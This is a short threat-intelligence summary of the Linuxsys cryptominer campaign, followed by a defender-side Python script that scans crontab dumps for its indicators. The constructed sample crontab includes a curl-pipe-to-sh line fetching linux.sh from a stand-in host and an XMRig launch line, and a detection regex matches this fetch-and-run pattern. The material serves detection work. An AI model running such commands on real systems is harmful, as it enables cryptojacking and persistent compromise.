The Linuxsys cryptominer is part of a long-running campaign active since at least 2021, consistently exploiting multiple web application vulnerabilities to deploy the Linuxsys coinminer on compromised systems. The attacker utilizes a stable methodology: exploiting n-day vulnerabilities in web servers, deploying an initial bash script (linux.sh) that downloads the miner, configuration files, and persistence mechanisms from compromised legitimate websites. This strategy not only evades detection by leveraging trusted domains but also ensures the miner remains operational via cron jobs. Despite the modest financial gain (around $8 per day), the operation demonstrates disciplined infrastructure management and sustained activity over years.
The campaign has been linked to the exploitation of several CVEs, including CVE-2021-41773 and others disclosed between 2023 and 2024, across various web platforms. Payload distribution relies on staging the malware on third-party compromised hosts, while the mining operation connects to the hashvault.pro pool using the XMRig miner.
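A defender-side check for the persistence pattern described above, written as an added example and not part of the original report: it scans a crontab dump for the indicators the summary names (the linux.sh staging script, the XMRig binary and the hashvault.pro pool) together with the generic "fetch a remote script and pipe it into a shell" pattern. The sample crontab is constructed.

```python
import re

# Indicators taken from the report summary: the staging script name,
# the XMRig miner and the hashvault.pro pool. Everything else is constructed.
SCRIPT_NAME = "linux.sh"
MINER_NAME = "xmrig"
POOL_DOMAIN = "hashvault.pro"

# Cron commands that download a remote script and pipe it straight into sh/bash.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def classify_cron_line(line: str) -> list[str]:
    """Return the indicator names matched by a single crontab line."""
    hits: list[str] = []
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return hits  # blank lines and comments carry no command
    lower = stripped.lower()
    if SCRIPT_NAME in lower:
        hits.append("staging-script")
    if MINER_NAME in lower:
        hits.append("miner-binary")
    if POOL_DOMAIN in lower:
        hits.append("mining-pool")
    if FETCH_AND_RUN.search(lower):
        hits.append("fetch-and-exec")
    return hits


def scan_crontab(text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers of a crontab dump to their indicator hits."""
    findings: dict[int, list[str]] = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = classify_cron_line(line)
        if hits:
            findings[n] = hits
    return findings


# Constructed sample: two benign entries, one staging entry, one miner entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://compromised-site.example/linux.sh | sh
@reboot /tmp/.x/xmrig -o hashvault.pro:443
30 1 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    for n, hits in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"line {n}: {', '.join(hits)}")
```

The same function can be pointed at `crontab -l` output for each user and at the files under `/etc/cron.d` to surface the re-download loop that keeps the miner alive.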